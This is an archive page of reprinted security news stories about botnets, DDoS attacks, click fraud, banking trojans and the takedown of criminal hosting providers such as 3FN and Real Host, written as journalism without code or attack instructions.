CyberInsecure.com

Archive for the ‘Botnets’ Category

Swedish authorities are no closer to discovering who may have been behind two distributed denial-of-service (DDoS) attacks that downed the websites of the police and some 40 media sites on Thursday.

The media companies affected by the initial attack all rent server space from Swedish IT service provider Basefarm. According to Baseform, the attack was specifically aimed at one of its clients, media IT development company Adeprimo. “Normally, a website with relatively high traffic will receive around 800 requests per second,” said Basefarm CEO Sara Murby Forste in a statement. “During the attack on Adeprimo, we were registering around 400,000 requests per second,” she added.

News websites affiliated with the Stampen media group, which uses Adeprimo’s media platform, were among those hardest hit. These include main Gothenburg newspaper Göteborgs-Posten, whose site was inaccessible from early morning until lunchtime on Thursday.

Basefarm said it did not receive any warning or threat prior to the attack. The company is preparing to submit a report to the police and is continuing an internal investigation into the attack.

“We know from the nature of the attack that they possess a lot of knowledge. This took place in a planned manner, outside Europe, and with serious force,” said Basefarm’s technical manager Stefan Månsby. “There is much to suggest that the traffic came from Asia and the United States. It could well be Asian, bouncing via the US.”

A second attack later in the day knocked out the website of the Swedish police, which was down for a couple of hours hours in the late afternoon. Police IT experts believe the two attacks are almost certainly linked. “I don’t think it’s a coincidence,” said Ann-Marie Alverås, head of the national police’s web security division. “The amount of traffic was exactly the same in both attacks and we too witnessed traffic from the United States. But the saboteur could be anywhere in the world,” she added.

Thursday’s attacks are to be investigated by the police’s IT crimes unit. Ann-Marie Alverås said the purpose of the attacks remained a mystery. “But I can hazard a guess that it was to attract attention,” she said.

Credit: thelocal.se

Malware-infected computers are increasingly being used to perpetrate click fraud, according to a study released Thursday that found their contribution was the highest since researchers began compiling statistics on the crime.

In the third quarter of this year, 42.6 percent of fraudulent clicks were generated by computers that were part of botnets, compared with 36.9 percent the previous quarter and about 27.6 percent in the same period of 2008. The increase comes as criminals trying to profit from click fraud take advantage of new advances in malware that make the practice harder to detect.

“As the botnets get more sophisticated, they’re able to perpetrate more click fraud,” said Paul Pellman, CEO of Click Forensics, the advertising auditing firm that prepared the report. “They’re finding new ways of being distributed, and that’s reflected in the data.”

The jump in botnet use over the past year comes as the overall amount of click fraud dropped, from 16 percent of all paid ads in Q3 of 2008 to 14.1 percent last quarter. That means manual forms of click fraud, in which large numbers of individuals engage in the practice, has decreased by an even larger margin. Many of those people get paid to knowingly gin the advertising results, while others are tricked into it.

The data was compiled by monitoring pay-per-click campaigns on more than 300 ad networks and on advertisers’ web sites.

Click fraud attempts to siphon away the commissions advertisers pay web site operators each time an ad on one of their pages is clicked on by a legitimate visitor. Fraudsters often set up websites with little or no content and then pocket big profits when ads from Google and other providers are viewed through the process.

Automated click fraud has existed for years, but over the past few months, researchers have identified several botnets that prominently offer such capabilities. Both the web-based infection known as Gumblar and the so-called Bahama Botnet contain malware that causes infected PCs to return altered Google results. When users click on them, they are taken to a series of intermediate links before arriving at their final destination.

“It’s in everyone’s best interest in the online community to find and stamp out click fraud,” Pellman said. “The fraudsters are trying to stay a step ahead of those efforts.”

Credit: The Register

Some sections of the popular PBS.org Web site have been hijacked by hackers serving up a cocktail of dangerous exploits, according to researchers at Purewire. Attempts to access certain PBS Web site pages yielded JavaScript that serves exploits from a malicious domain via an iframe.

The malicious JavaScript was found on the “Curious George” page that provides content on the popular animation series. A look at the code on the hijacked site shows malicious activity coming from a third-party qxfcuc.info domain.

The domain qxfcuc.info is part of a malware campaign that includes tens of similar websites hosted off of a handful of common IP addresses. Similar exploit code was served from most of these domains, although a handful (e.g., yyoqny.info) display a message that suggests the criminal behind this campaign is compromising systems to build a botnet he will likely later lease. Translated from Russian, that message tells prospective leasers to “Send a message to ICQ #559156803; stats available under ststst02.”

The URL serves exploits that target a variety of software vulnerabilities, including those in Acrobat Reader (CVE-2008-2992, CVE-2009-0927, and CVE-2007-5659), AOL Radio AmpX (CVE-2007-6250), AOL SuperBuddy (CVE-2006-5820) and Apple QuickTime (CVE-2007-0015).

Purewire said the exploit site is part of a malware campaign that includes tens of similar Web sites hosted off of a handful of common IP addresses.

PBS.org has already removed the malicious javascript from its site.

Credit: ZDnet.com Security Blogs

Hackers have programmed a Trojan that uses Google Groups newsgroups to distribute commands. Trojan distribution via newsgroups has existed for more than a decade, but using newsgroups as a command and control channel is a new innovation.

The Grups Trojan itself is quite simple and is only noteworthy for the command and control structure it deploys. The malware is programmed to log into a Chinese language newsgroup to receive commands, Symantec security researcher Gavin O’Gorman writes.

When successfully logged in, the Trojan requests a page from a private newsgroup, escape2sun. The page contains commands for the Trojan to carry out. The command consists of an index number, a command line to execute, and optionally, a file to download. Responses are uploaded as posts to the newsgroup using the index number as a subject.

The post and page contents are encrypted using the RC4 stream cipher and then base64 encoded. The attacker can thus issue confidential commands and read responses. If no command is received from the static page, the infected host uploads the current time.

Miscreants need to maintain communications with backdoor Trojans to order them to distribute spam, launch denial of service attacks or upload compromised data, for example. Traditionally IRC channels have been used to carry out this function. More recently black hats have experimented with different control channels such as Google Groups, as in the latest incident, and a few weeks ago, Twitter.

Using Google Groups has advantages in anonymity but leaves a record of Trojan activity for security researchers to analyze. For example, the growth of the Trojan can be tracked by the volume of posts. The information targeted can also be discerned.

Examining the Trojan itself provides more clues. Several debug strings in the Trojan code provide evidence that the malware may be a prototype, testing the use of newsgroups for botnet/Trojan command and control. Commands issued though the newsgroup refer to actions involving actions involving .tw (Taiwanese) domains. This, along with the simplified Chinese language of the newsgroup in question, provide evidence that the malware was cooked up in either Taiwan or mainland China.

Only a small number of samples of Grups Trojan have appeared in the wild, leading to Symanec’s classification of the malware as a low risk threat.

Credit: The Register

Ilomo has been present in the malware landscape since at least the end of 2005, making it a veteran of the modern malware era. During that time it has changed its code constantly with an emphasis being placed on making the malware very difficult to reverse engineer, and also with the goal of staying under the radar. As with all malware it has picked up several names over that time but the most common are Ilomo, Clampi, Ligats or Rscan.

Ilomo botnet has being active without attracting too much unwanted attention from the security industry. Like Pushdo botnet, the Ilomo threat is quite modular in nature which makes it difficult to see the actions of the overall threat. Added to this is the fact that it uses a commercial virtual machine obfuscator, significantly adding to the effort involved in reverse engineering the malware binaries.

Ilomo has two key components to its business plan. The first is good old fashioned information stealing. Ilomo injects its code into the browser and monitors the internet connection waiting for the user to connect to one of over 4000 banking, financial or webmail sites. Not content with simply stealing the user’s credentials, Ilomo can also “piggyback” on the user’s session – transferring funds from an infected user’s account and making a mockery of the bank’s secure login system. Ilomo will also harvest all other login credentials from the machine – ftp, web servers, local administrators etc. These are then used to spread itself across the network and to take control of web servers online, which it will use to host new versions of the malware.

Ilomo‘s second source of revenue is selling “anonymity as a service”. Every infected Ilomo machine acts as a proxy so that criminals can route their illegal activities through different networks and countries. In addition to hiding the criminals identity this proxy network is very useful for defeating another defense built into many banking sites – namely that they can only be accessed from certain countries. If a criminal needs to access a Brazilian bank, they simply use an infected Ilomo machine in Brazil to route the connection.

More information and detailed technical aspects can be found here.

Credit: TrenLabs Malware Blog By TrendMicro

Twitter was knocked offline on Thursday after the site became the victim of a distributed denial of service attack. Users of the micro-blogging service are used to seeing the fail whale, a graphic that appears when service is over capacity, but this time around the site was left completely unreachable from around 1500 on Thursday (UK time) for around 90 minutes.

A terse messages on Twitter’s status blog initially said the site was down before adding “We are defending against a denial-of-service attack, and will update status again shortly”.

Graham Cluley, a security consultant at Sophos, initially said the hallmarks of the outage were not those of a planned downtime.

“Something has clearly gone wrong,” he said. “It could be human error or some other cause. We have nothing to indicate that the outage is caused by a security problem at this point.”

The outage has at least one positive effect. “All those Twitter addicts will be doing something more useful instead,” Cluley quipped.

As Twitter struggled to return to normal Wednesday evening, a trickle of details suggested that the outage that left 30 million users unable to use the micro-blogging service for several hours - at least in part - may have been the result of a spam campaign that targeted a single user who vocally supports the Republic of Georgia.

According to Bill Woodcock, research director at the non-profit Packet Clearing House, the torrent of traffic that brought the site to its knees wasn’t the result of a traditional DDoS, or distributed denial of service attack, but rather people who clicked on a link in spam messages that referenced a well-known blogger called Cyxymu.

As spam goes, the emails looked benign enough. One of them carried the subject “Visit my blog” and contained the words “thanks for looking at my blog” in the body. They contained respective links to Cyxymu’s accounts on Twitter, Facebook, LiveJournal and YouTube, all of which also reported receiving abnormal amounts of traffic on Thursday.

“This was not like a botnet-style DDoS,” Woodcock told The Register. “This was a joejob where people were just clicking on links in email and the people clicking on the links were not malefactors. They were just the sort of idiots that click on links in email without knowing what they are.”

Joejobs are spam messages that are designed not to push Viagra but to induce someone to click on a link in the hopes of harming the site being linked to.

Twitter has so far said little on its blog and status page except that it spent much of the day fighting against a denial of service attack and that as late as 4:45 pm California time, latency problems were still causing some users to receive error pages. Company representatives didn’t respond to emails seeking comment.

The theory was backed by this article from CNET News, which quoted Facebook’s chief security officer saying the attacks targeting multiple websites all contained traffic linking to accounts held by Cyxymu.

“It was a simultaneous attack across a number of properties targeting him to keep his voice from being heard,” Facebook’s Max Kelly told reporter Elinor Mills. “We’re actively investigating the source of the attacks and we hope to be able to find out the individuals involved in the back end and to take action against them if we can.”

Kelly made no reference to spam messages, so it remained unclear if the emails were the only cause of the mass requests to Cyxymu’s profiles or if there were other causes as well.

Cyxymu has long been viewed as an antagonist by some Russian supporters, who take issue with the blogger’s coverage of recent military conflicts in Georgia.

Credit: The Register

Upstream providers have pulled the plug on Latvian ISP Real Host over allegations it maintained cybercrime servers linked to the Zeus botnet.

Real Host was disconnected by its upstream provider, Junik, on Monday, after TeliaSonera told Junik to either cut the juice or face sanctions itself, according to reports by the FT and other news outlets.

Like other disconnected hosting companies before it, such as McColo and Atrivo, Real Host was linked to an unsavory list of botnet-related cybercrime activities.

Security researchers, who described Real Host as a cybercrime and bullet proof hosting hub, said its systems acted as command and control nodes for the Zeus botnet and a locus for exploits based on a recently patched Adobe Flash exploit, among other crimes. Hostexploit has a full breakdown of the extensive charge sheet against Real Host here.

The enforcement action against Real Host is the first time the internet community put pressure on upstream providers to take action on an allegedly rogue ISP in eastern Europe.

Credit: The Register

ESET have issued a press release concerning Win32/TrojanDownloader.Bredolab.AA, which made the top ten threat listing in June ThreatSense.Net® report.

The Bredolab trojan is the top-scoring threat in the Czech Republic and Slovakia, but also scoring high in other European countries. It appears in the Top 5 list of threats in Austria, Poland, Turkey; in the Top 10 in Bulgaria, the United Kingdom, Sweden, Belgium, Russia and Germany; in the Top 20 in the Ukraine and Italy, and in the Top 40 in France. In Ireland it has climbed from 40th place into the Top 15.

This is a class of application that is intended to act as an intermediary to the infective process. The label is applied to a range of variants that commonly inject themselves into running processes and attempt to disable some security processes, while creating a registry key that ensures that the malicious executable is run at every system startup. It communicates with its command and control (C&C) server over HTTP. This malware has been associated with other malware activity such as Gumblar and Win32/Wigon. There is a great deal of Bredolab activity in combination with Flash (SWF) and Acrobat (PDF) exploits, so it’s more important than ever to keep up with Adobe updates and patches as well as Microsoft’s. Indeed, nowadays it pays to keep an eye on new patches for any applications and utilities you use. Hopefully, Adobe’s new patching mechanisms will help to reduce the impact of these exploits in the longer term.

When a downloader is installed and active on a system, its main (or only) job is to download malware from a remote site, but it may well make changes to the system such as those described above in order to increase its chances of doing so successfully. There have also been some cases when Bredolab Trojan was downloaded by other downloaders in the Win32/TrojanDownloader.FakeAlert family, demonstrating a connection to rogue security application malware.

Other vendors describe different variant suffixes (.G, .HW etc.) as referring to this detection: however, because of the varying detection algorithms used by different vendors, it’s unlikely that there will be an exact match in all cases.

The use of file formats such as PDF which most users think of as trustworthy is not a new tactic: in fact, like other document formats such as those used by Microsoft Office, they’re commonly used in targeted phishing attacks. However, the noticeable rise in Bredolab detections, especially in Europe, demonstrates that it is extremely active at the moment.

Users should, as always, take care when opening e-mail attachments and exercise caution while browsing the web, but they should also be sure to keep up with security patches to application software.

Credit: ESET ThreatBlog

Researchers at ESET have reliable intelligence that the Waledac botnet is currently being prepared for a spam campaign around the Independence Day theme. They have registered at least 18 domain names all related to the theme of video, fireworks, and Independence Day. The criminals behind Waledac are preparing to start sending spam with links to supposed videos of Independence Day fireworks which are, in reality, fresh copies of the Waledac malware family.

ESET estimates the size of Waledac’s botnet as tens of thousands of infected computers. More than 20,000 compromised computers will be used to send the malicious emails, in an effort to increase the size of the botnet. This effort will allow the criminals to send out even more spam. Currently, detection of the new variants of Waledac is quite low, with only a handful of antivirus products detecting the newest threat.

The Waledac family has been active since the end of 2008 and has been known to exploit events such as Christmas or Valentine’s day in order to spread in a way very similar to methods used by the infamous Storm Worm. Also, just like the Storm Worm, Waledac uses a peer-to-peer network to receive commands from its controllers. The main objective behind the Waledac operation is to use infected computers to send spam.

Consumers are reminded not to follow links in unsolicited emails, even if they appear to come from someone they know. As dangerous as fireworks can be, when used as directed, they are still safer than unsolicited emails!

Credit: ESET ThreatBlog
Credit: Websense

Federal authorities have shut down what they said was the worst US-based web hosting provider after convincing a judge it actively participated in the distribution of child pornography, spam, malware, and other net-based menaces.

The US Federal Trade Commission obtained the court order against 3FN.net, a service provider with servers mostly located in San Jose, California that also operated under the name Pricewert. Dated June 2, it commanded all companies providing upstream services to 3FN to immediately pull the plug. The order was issued in secret to prevent the operators from being able to destroy evidence or find new hosts, something FTC attorneys said was necessary given the extreme nature of the data it hosted.

“This content includes a witches’ brew of child pornography, botnet command and control servers, spyware, viruses, trojans, phishing-related sites, and pornography featuring violence, bestiality, and incest,” they wrote in court documents. “In addition to recruiting and willingly distributing this illegal, malicious and harmful content, Pricewert actively colludes with its criminal clientele in several areas, including the maintenance and deployment of networks of compromised computers known as botnets.”

This week’s action is the most significant shutdown since the shuttering in November of McColo, another Northern California-based service provider with ties to online crime. In the months following the takedown, spam volume dropped by as much as 40 percent.

“We suspect it’s been programmed in such a way that when the command and control goes down it just continues to execute” old instructions, said Matt Sergeant, a senior antispam technologist at MessageLabs, which was recently purchased by Symantec. “That gives the spammers time to find a new command and control host. McColo taught spammers that they needed multiple command and controls and not to put all their eggs in one basket.”

Court documents alleged a litany of illegal services that 3FN operators actively offered. They include:

The site allegedly communicated with malicious software hosted McColo. Investigators who sifted through the contents of the latter shuttered provider found instant message logs in which high-level 3FN employees provided technical support to customers trying to configure botnets with as many as 200,000 nodes.

A NASA investigator probing intrusions to the space agency’s networks found 22 separate attacks on NASA computers originating from IP addresses controlled by 3FN, including five this year, one as recently as April. NASA estimates it has spent more than $14,000 to repair the damage.

A separate investigator managed to peer inside 3FN after reverse engineering malware masquerading as a video player that was hosted by the provider. What he found were logs showing that thousands of computers had been compromised by the malicious code. He also located more than 40 websites hosted by 3FN that are possible hosts of child pornography, some with names such as little-incest.com and littles-raped.com. Using a text-only browser to visit some of the sites, he found text promising “illegal photos of little girls” and “very little schoolgirls raped.”

One of the biggest complaints among white hat hackers is the difficulty of shutting down networks that flagrantly violate the law. This week’s action is the first time the FTC has used its congressional mandate to protect US consumer to sever a service provider suspected of illegal activity.

The temporary restraining order, issued by US District Judge Ronald M. White of San Jose, also freezes all of the company’s assets. A hearing in the case is scheduled for June 15.

Assistance in the case came from a variety of sources including , computer forensics expert Gary Warner from the University of Alabama at Birmingham, NASA’s office of the inspector general, the National Center for Missing and Exploited Children, the Shadowserver Foundation, Symantec and the Spamhaus project.

Credit: The Register